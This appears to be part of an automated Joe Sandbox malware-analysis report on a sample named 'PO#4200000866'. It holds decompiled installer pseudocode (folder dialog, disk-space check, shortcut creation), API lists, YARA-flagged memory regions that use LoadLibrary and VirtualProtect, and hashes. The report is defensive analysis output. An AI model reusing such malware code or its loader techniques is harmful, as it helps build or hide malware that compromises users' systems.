                                                                                      				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                      				if(_a8 == 0x40b) {
                                                                                      					E00405CAC(0x3fb, _t146);
                                                                                      					E004068EF(_t146);
                                                                                      				}
                                                                                      				_t167 = _a4;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					L8:
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L20:
                                                                                      						if(_a8 == 0x40f) {
                                                                                      							L22:
                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                      							_v12 = _v12 & 0x00000000;
                                                                                      							E00405CAC(0x3fb, _t146);
                                                                                      							if(E0040603F(_t186, _t146) == 0) {
                                                                                      								_v8 = 1;
                                                                                      							}
                                                                                      							E00406668(0x421718, _t146);
                                                                                      							_t87 = E00406A35(1);
                                                                                      							_v16 = _t87;
                                                                                      							if(_t87 == 0) {
                                                                                      								L30:
                                                                                      								E00406668(0x421718, _t146);
                                                                                      								_t89 = E00405FE2(0x421718);
                                                                                      								_t158 = 0;
                                                                                      								if(_t89 != 0) {
                                                                                      									 *_t89 = 0;
                                                                                      								}
                                                                                      								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                      									goto L35;
                                                                                      								} else {
                                                                                      									_t169 = 0x400;
                                                                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                      									asm("cdq");
                                                                                      									_v48 = _t109;
                                                                                      									_v44 = _t156;
                                                                                      									_v12 = 1;
                                                                                      									goto L36;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t159 = 0;
                                                                                      								if(0 == 0x421718) {
                                                                                      									goto L30;
                                                                                      								} else {
                                                                                      									goto L26;
                                                                                      								}
                                                                                      								while(1) {
                                                                                      									L26:
                                                                                      									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                                                                                      									if(_t114 != 0) {
                                                                                      										break;
                                                                                      									}
                                                                                      									if(_t159 != 0) {
                                                                                      										 *_t159 =  *_t159 & _t114;
                                                                                      									}
                                                                                      									_t160 = E00405F83(0x421718);
                                                                                      									 *_t160 =  *_t160 & 0x00000000;
                                                                                      									_t159 = _t160;
                                                                                      									 *_t159 = 0x5c;
                                                                                      									if(_t159 != 0x421718) {
                                                                                      										continue;
                                                                                      									} else {
                                                                                      										goto L30;
                                                                                      									}
                                                                                      								}
                                                                                      								_t150 = _v44;
                                                                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                      								_v44 = _t150 >> 0xa;
                                                                                      								_v12 = 1;
                                                                                      								_t158 = 0;
                                                                                      								__eflags = 0;
                                                                                      								L35:
                                                                                      								_t169 = 0x400;
                                                                                      								L36:
                                                                                      								_t95 = E00404F52(5);
                                                                                      								if(_v12 != _t158) {
                                                                                      									_t197 = _v44;
                                                                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                      										_v8 = 2;
                                                                                      									}
                                                                                      								}
                                                                                      								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                                                                                      									E00404F3A(0x3ff, 0xfffffffb, _t95);
                                                                                      									if(_v12 == _t158) {
                                                                                      										SetDlgItemTextW(_a4, _t169, 0x421708);
                                                                                      									} else {
                                                                                      										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                                                                                      									}
                                                                                      								}
                                                                                      								_t96 = _v8;
                                                                                      								 *0x42a304 = _t96;
                                                                                      								if(_t96 == _t158) {
                                                                                      									_v8 = E0040140B(7);
                                                                                      								}
                                                                                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                      									_v8 = _t158;
                                                                                      								}
                                                                                      								E004045E6(0 | _v8 == _t158);
                                                                                      								if(_v8 == _t158 &&  *0x423738 == _t158) {
                                                                                      									E00404A0E();
                                                                                      								}
                                                                                      								 *0x423738 = _t158;
                                                                                      								goto L53;
                                                                                      							}
                                                                                      						}
                                                                                      						_t186 = _a8 - 0x405;
                                                                                      						if(_a8 != 0x405) {
                                                                                      							goto L53;
                                                                                      						}
                                                                                      						goto L22;
                                                                                      					}
                                                                                      					_t118 = _a12 & 0x0000ffff;
                                                                                      					if(_t118 != 0x3fb) {
                                                                                      						L12:
                                                                                      						if(_t118 == 0x3e9) {
                                                                                      							_t152 = 7;
                                                                                      							memset( &_v76, 0, _t152 << 2);
                                                                                      							_v80 = _t167;
                                                                                      							_v72 = 0x423748;
                                                                                      							_v60 = E00404E0B;
                                                                                      							_v56 = _t146;
                                                                                      							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                                                                                      							_t122 =  &_v80;
                                                                                      							_v64 = 0x41;
                                                                                      							__imp__SHBrowseForFolderW(_t122);
                                                                                      							if(_t122 == 0) {
                                                                                      								_a8 = 0x40f;
                                                                                      							} else {
                                                                                      								__imp__CoTaskMemFree(_t122);
                                                                                      								E00405F37(_t146);
                                                                                      								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                                                                                      								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp") {
                                                                                      									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                                                                                      									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                                                                                      										lstrcatW(_t146, 0x428200);
                                                                                      									}
                                                                                      								}
                                                                                      								 *0x423738 =  *0x423738 + 1;
                                                                                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                      							}
                                                                                      						}
                                                                                      						goto L20;
                                                                                      					}
                                                                                      					if(_a12 >> 0x10 != 0x300) {
                                                                                      						goto L53;
                                                                                      					}
                                                                                      					_a8 = 0x40f;
                                                                                      					goto L12;
                                                                                      				} else {
                                                                                      					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                      					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                                                                                      						E00405F37(_t146);
                                                                                      					}
                                                                                      					 *0x429238 = _t167;
                                                                                      					SetWindowTextW(_t166, _t146);
                                                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                      					_push(1);
                                                                                      					E004045C4(_t167);
                                                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                      					_push(0x14);
                                                                                      					E004045C4(_t167);
                                                                                      					E004045F9(_t166);
                                                                                      					_t138 = E00406A35(8);
                                                                                      					if(_t138 == 0) {
                                                                                      						L53:
                                                                                      						return E0040462B(_a8, _a12, _a16);
                                                                                      					} else {
                                                                                      						 *_t138(_t166, 1);
                                                                                      						goto L8;
                                                                                      					}
                                                                                      				}
                                                                                      			}













































                                                                                      0x00404ab5
                                                                                      0x00404abb
                                                                                      0x00404ac1
                                                                                      0x00404ace
                                                                                      0x00404adc
                                                                                      0x00404adf
                                                                                      0x00404ae7
                                                                                      0x00404aed
                                                                                      0x00404aed
                                                                                      0x00404af9
                                                                                      0x00404afc
                                                                                      0x00404b6a
                                                                                      0x00404b71
                                                                                      0x00404c48
                                                                                      0x00404c4f
                                                                                      0x00404c5e
                                                                                      0x00404c5e
                                                                                      0x00404c62
                                                                                      0x00404c6c
                                                                                      0x00404c79
                                                                                      0x00404c7b
                                                                                      0x00404c7b
                                                                                      0x00404c89
                                                                                      0x00404c90
                                                                                      0x00404c97
                                                                                      0x00404c9a
                                                                                      0x00404cd6
                                                                                      0x00404cd8
                                                                                      0x00404cde
                                                                                      0x00404ce3
                                                                                      0x00404ce7
                                                                                      0x00404ce9
                                                                                      0x00404ce9
                                                                                      0x00404d05
                                                                                      0x00000000
                                                                                      0x00404d07
                                                                                      0x00404d0a
                                                                                      0x00404d18
                                                                                      0x00404d1e
                                                                                      0x00404d1f
                                                                                      0x00404d22
                                                                                      0x00404d25
                                                                                      0x00000000
                                                                                      0x00404d25
                                                                                      0x00404c9c
                                                                                      0x00404c9e
                                                                                      0x00404ca2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404ca4
                                                                                      0x00404ca4
                                                                                      0x00404cb1
                                                                                      0x00404cb6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404cba
                                                                                      0x00404cbc
                                                                                      0x00404cbc
                                                                                      0x00404cc5
                                                                                      0x00404cc7
                                                                                      0x00404ccc
                                                                                      0x00404ccf
                                                                                      0x00404cd4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404cd4
                                                                                      0x00404d31
                                                                                      0x00404d3b
                                                                                      0x00404d3e
                                                                                      0x00404d41
                                                                                      0x00404d48
                                                                                      0x00404d48
                                                                                      0x00404d4a
                                                                                      0x00404d4a
                                                                                      0x00404d4f
                                                                                      0x00404d51
                                                                                      0x00404d59
                                                                                      0x00404d60
                                                                                      0x00404d62
                                                                                      0x00404d6d
                                                                                      0x00404d6d
                                                                                      0x00404d62
                                                                                      0x00404d7d
                                                                                      0x00404d87
                                                                                      0x00404d8f
                                                                                      0x00404daa
                                                                                      0x00404d91
                                                                                      0x00404d9a
                                                                                      0x00404d9a
                                                                                      0x00404d8f
                                                                                      0x00404daf
                                                                                      0x00404db4
                                                                                      0x00404db9
                                                                                      0x00404dc2
                                                                                      0x00404dc2
                                                                                      0x00404dcb
                                                                                      0x00404dcd
                                                                                      0x00404dcd
                                                                                      0x00404dd9
                                                                                      0x00404de1
                                                                                      0x00404deb
                                                                                      0x00404deb
                                                                                      0x00404df0
                                                                                      0x00000000
                                                                                      0x00404df0
                                                                                      0x00404c9a
                                                                                      0x00404c51
                                                                                      0x00404c58
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404c58
                                                                                      0x00404b77
                                                                                      0x00404b80
                                                                                      0x00404b9a
                                                                                      0x00404b9f
                                                                                      0x00404ba9
                                                                                      0x00404bb0
                                                                                      0x00404bbc
                                                                                      0x00404bbf
                                                                                      0x00404bc2
                                                                                      0x00404bc9
                                                                                      0x00404bd1
                                                                                      0x00404bd4
                                                                                      0x00404bd8
                                                                                      0x00404bdf
                                                                                      0x00404be7
                                                                                      0x00404c41
                                                                                      0x00404be9
                                                                                      0x00404bea
                                                                                      0x00404bf1
                                                                                      0x00404bfb
                                                                                      0x00404c03
                                                                                      0x00404c10
                                                                                      0x00404c24
                                                                                      0x00404c28
                                                                                      0x00404c28
                                                                                      0x00404c24
                                                                                      0x00404c2d
                                                                                      0x00404c3a
                                                                                      0x00404c3a
                                                                                      0x00404be7
                                                                                      0x00000000
                                                                                      0x00404b9f
                                                                                      0x00404b8d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404b93
                                                                                      0x00000000
                                                                                      0x00404afe
                                                                                      0x00404b0b
                                                                                      0x00404b14
                                                                                      0x00404b21
                                                                                      0x00404b21
                                                                                      0x00404b28
                                                                                      0x00404b2e
                                                                                      0x00404b37
                                                                                      0x00404b3a
                                                                                      0x00404b3d
                                                                                      0x00404b45
                                                                                      0x00404b48
                                                                                      0x00404b4b
                                                                                      0x00404b51
                                                                                      0x00404b58
                                                                                      0x00404b5f
                                                                                      0x00404df6
                                                                                      0x00404e08
                                                                                      0x00404b65
                                                                                      0x00404b68
                                                                                      0x00000000
                                                                                      0x00404b68
                                                                                      0x00404b5f

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                      • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                                        • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                        • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75703420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                        • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                        • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75703420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                        • Part of subcall function 004068EF: CharPrevW.USER32(?,?,75703420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                      • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                        • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                        • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                        • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
                                                                                      • API String ID: 2624150263-3840399979
                                                                                      • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                      • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                      • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                      • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(00009176,?,?), ref: 03C81739
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: B$T]S&$`
                                                                                      • API String ID: 1029625771-4195665176
                                                                                      • Opcode ID: 1f783aed1a8463020ae21703a4b127b194ba88c05a087938a5524225e93b31c5
                                                                                      • Instruction ID: 7c9c6871e9d31e3091da13308a2f739099ba28c5126018f761c561e3c828a6b7
                                                                                      • Opcode Fuzzy Hash: 1f783aed1a8463020ae21703a4b127b194ba88c05a087938a5524225e93b31c5
                                                                                      • Instruction Fuzzy Hash: D9415B216043CACADF309D3DCD593F92FA35F56364F6A066EDC8ACF144EB7186458A05
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(00009176,?,?), ref: 03C81739
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: B$T]S&$`
                                                                                      • API String ID: 1029625771-4195665176
                                                                                      • Opcode ID: 5d2b65ad902028763a92b968892bf1a3bc605b31acb3e6319093289e974b5d22
                                                                                      • Instruction ID: f611c941872e4ae6e37d270359fdd5365352c015180d55766bf96d572cd3b656
                                                                                      • Opcode Fuzzy Hash: 5d2b65ad902028763a92b968892bf1a3bc605b31acb3e6319093289e974b5d22
                                                                                      • Instruction Fuzzy Hash: 0C316C3664438DCAEF349D398E983FD26A7AF552A0F6A051BDC0BCF244E77487458A06
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 67%
                                                                                      			E004021AA(void* __eflags) {
                                                                                      				signed int _t52;
                                                                                      				void* _t56;
                                                                                      				intOrPtr* _t60;
                                                                                      				intOrPtr _t61;
                                                                                      				intOrPtr* _t62;
                                                                                      				intOrPtr* _t64;
                                                                                      				intOrPtr* _t66;
                                                                                      				intOrPtr* _t68;
                                                                                      				intOrPtr* _t70;
                                                                                      				intOrPtr* _t72;
                                                                                      				intOrPtr* _t74;
                                                                                      				intOrPtr* _t76;
                                                                                      				intOrPtr* _t78;
                                                                                      				intOrPtr* _t80;
                                                                                      				void* _t83;
                                                                                      				intOrPtr* _t91;
                                                                                      				signed int _t101;
                                                                                      				signed int _t105;
                                                                                      				void* _t107;
                                                                                      
                                                                                      				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                                      				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                                      				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                                      				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                                      				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                                      				_t52 =  *(_t107 - 0x20);
                                                                                      				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                                      				_t101 = _t52 & 0x00008000;
                                                                                      				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                                      				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                                      				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                                      					E00402DA6(0x21);
                                                                                      				}
                                                                                      				_t56 = _t107 + 8;
                                                                                      				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                                                      				if(_t56 < _t83) {
                                                                                      					L14:
                                                                                      					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                                      					_push(0xfffffff0);
                                                                                      				} else {
                                                                                      					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                                      					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                                                      					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                                      					if(_t61 >= _t83) {
                                                                                      						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                                      						if(_t101 == _t83) {
                                                                                      							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Temp");
                                                                                      						}
                                                                                      						if(_t105 != _t83) {
                                                                                      							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                                      						}
                                                                                      						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                                      						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                                      						if( *_t91 != _t83) {
                                                                                      							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                                      							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                                      						}
                                                                                      						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                                      						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                                      						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                                      						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                      							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                      							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                                      						}
                                                                                      						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                                      						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                      					}
                                                                                      					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                                      					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                                      						_push(0xfffffff4);
                                                                                      					} else {
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      				E00401423();
                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                                      				return 0;
                                                                                      			}






















                                                                                      0x004021b3
                                                                                      0x004021bd
                                                                                      0x004021c7
                                                                                      0x004021d1
                                                                                      0x004021dc
                                                                                      0x004021df
                                                                                      0x004021f9
                                                                                      0x004021fc
                                                                                      0x00402202
                                                                                      0x00402205
                                                                                      0x0040220f
                                                                                      0x00402213
                                                                                      0x00402213
                                                                                      0x00402218
                                                                                      0x00402229
                                                                                      0x00402231
                                                                                      0x004022e8
                                                                                      0x004022e8
                                                                                      0x004022ef
                                                                                      0x00402237
                                                                                      0x00402237
                                                                                      0x00402246
                                                                                      0x0040224a
                                                                                      0x0040224d
                                                                                      0x00402253
                                                                                      0x00402261
                                                                                      0x00402264
                                                                                      0x00402266
                                                                                      0x00402271
                                                                                      0x00402271
                                                                                      0x00402276
                                                                                      0x00402278
                                                                                      0x0040227f
                                                                                      0x0040227f
                                                                                      0x00402282
                                                                                      0x0040228b
                                                                                      0x0040228e
                                                                                      0x00402294
                                                                                      0x00402296
                                                                                      0x004022a0
                                                                                      0x004022a0
                                                                                      0x004022a3
                                                                                      0x004022ac
                                                                                      0x004022af
                                                                                      0x004022b8
                                                                                      0x004022be
                                                                                      0x004022c0
                                                                                      0x004022ce
                                                                                      0x004022ce
                                                                                      0x004022d1
                                                                                      0x004022d7
                                                                                      0x004022d7
                                                                                      0x004022da
                                                                                      0x004022e0
                                                                                      0x004022e6
                                                                                      0x004022fb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004022e6
                                                                                      0x004022f1
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42097271527.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42097227053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097343233.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097389831.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097535496.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097584589.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097644348.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42097694794.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInstance
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                                      • API String ID: 542301482-670666241
                                                                                      • Opcode ID: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                                                      • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                      • Opcode Fuzzy Hash: 4e8b9e8d9efc1323b126c51a2f9450484e7b2217165b473e9f4f1a567a0bf10e
                                                                                      • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoadMemoryProtectVirtual
                                                                                      • String ID: L|`$z;(
                                                                                      • API String ID: 3389902171-3364456688
                                                                                      • Opcode ID: 708d482caedbd2535eb7d462112541627a2a3e5010b2454768ef55a71746bcd1
                                                                                      • Instruction ID: 553ed19e3d2089cf94a1929e60004e5e5e26e7538eef6b095125621af362fb7b
                                                                                      • Opcode Fuzzy Hash: 708d482caedbd2535eb7d462112541627a2a3e5010b2454768ef55a71746bcd1
                                                                                      • Instruction Fuzzy Hash: 853207795083C68ECF31DF39C8987DA7BA2AF52364F49829ACC95CF196D3348646C712
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tEm$l&C]
                                                                                      • API String ID: 0-1997975911
                                                                                      • Opcode ID: 0f8045cd94048eb67680d0df8d871fe0887bf86bba8d374e022fe0fa43161826
                                                                                      • Instruction ID: 80e5d7ffae70bc4b59b53feb4de34dc2dc64135aabc899fcaa2008f8ef3dd2d5
                                                                                      • Opcode Fuzzy Hash: 0f8045cd94048eb67680d0df8d871fe0887bf86bba8d374e022fe0fa43161826
                                                                                      • Instruction Fuzzy Hash: BD9188725003419FCB20DF39C849BDA7BA1AF56364F6541AADC8ACF261D770CA46CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: n$}kA
                                                                                      • API String ID: 0-2311900827
                                                                                      • Opcode ID: 753bbd75c6c51ae812e8b80b6a88b9f4267f509a575df39b5098c705a9bac28b
                                                                                      • Instruction ID: bd1b0d019bf23ae9427a4c2c9c9cd657f95d7d1c5ebdf07034546c2065df8ee8
                                                                                      • Opcode Fuzzy Hash: 753bbd75c6c51ae812e8b80b6a88b9f4267f509a575df39b5098c705a9bac28b
                                                                                      • Instruction Fuzzy Hash: A59116316043999FCF34DE78CC697EA7BA2AF56350F99061EDC89DB210D7318A81CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42101494112.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_3c70000_PO#4200000866.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: i2$H
                                                                                      • API String ID: 0-3379199599
